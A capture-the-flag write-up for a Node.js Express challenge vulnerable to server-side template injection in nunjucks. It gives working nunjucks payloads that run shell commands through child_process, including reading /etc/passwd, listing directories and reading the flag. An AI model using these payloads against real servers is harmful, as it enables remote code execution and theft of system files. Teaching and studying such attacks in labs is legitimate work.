Tags: ssti web nodejs 

Rating: 3.0

In this challenge, no files were provided, only an URL to access. Accessing it:

![Alt text](https://github.com/uac-ctf/UA-CSW-CTF2022-Writeups/blob/master/web/sunset_intr/images/home_page.png?raw=true)

a simple HTML page is served with an input box. Interacting with it, we are sent to another page

![Alt text](https://github.com/uac-ctf/UA-CSW-CTF2022-Writeups/blob/master/web/sunset_intr/images/display_username.png?raw=true)

that is just displaying the content that comes in the *payload* query parameter. Looking at the response headers:

![Alt text](https://github.com/uac-ctf/UA-CSW-CTF2022-Writeups/blob/master/web/sunset_intr/images/app_headers.png?raw=true)

there is an *X-Powered-By: Express* header. If we search for that in Google, we will find out that is related to NodeJS [Express](https://expressjs.com/) framework.
To solve the challenge, the title is the clue "SunSet introspecTIon". If we remove the lower case letters, we will get *SSTI* that translates to [Server Side Template Injection](https://portswigger.net/research/server-side-template-injection). The other clue was the [nunjucks](https://mozilla.github.io/nunjucks/) in the description, which is a template engine for Js.

To be sure that the challenge is indeed related to an SSTI vulnerability, we can test it out with `{{7*7}}` that after render should result in 49 being served.

![Alt text](https://github.com/uac-ctf/UA-CSW-CTF2022-Writeups/blob/master/web/sunset_intr/images/ssti_test.png?raw=true)

and it is indeed that. Now we need to find a way to execute commands there, and we can use a great resource for that, Hacktricks. <https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#nunjucks>

{{range.constructor("return global.process.mainModule.require('child_process').execSync('cat /etc/passwd')")()}}

will result in

![Alt text](https://github.com/uac-ctf/UA-CSW-CTF2022-Writeups/blob/master/web/sunset_intr/images/ssti_passwd.png?raw=true)

Now, we just need to find the flag

// List the current directory
{{range.constructor("return global.process.mainModule.require('child_process').execSync('ls -la')")()}}
// Get the flag contents
{{range.constructor("return global.process.mainModule.require('child_process').execSync('cat flag')")()}}

![Alt text](https://github.com/uac-ctf/UA-CSW-CTF2022-Writeups/blob/master/web/sunset_intr/images/ssti_flag.png?raw=true)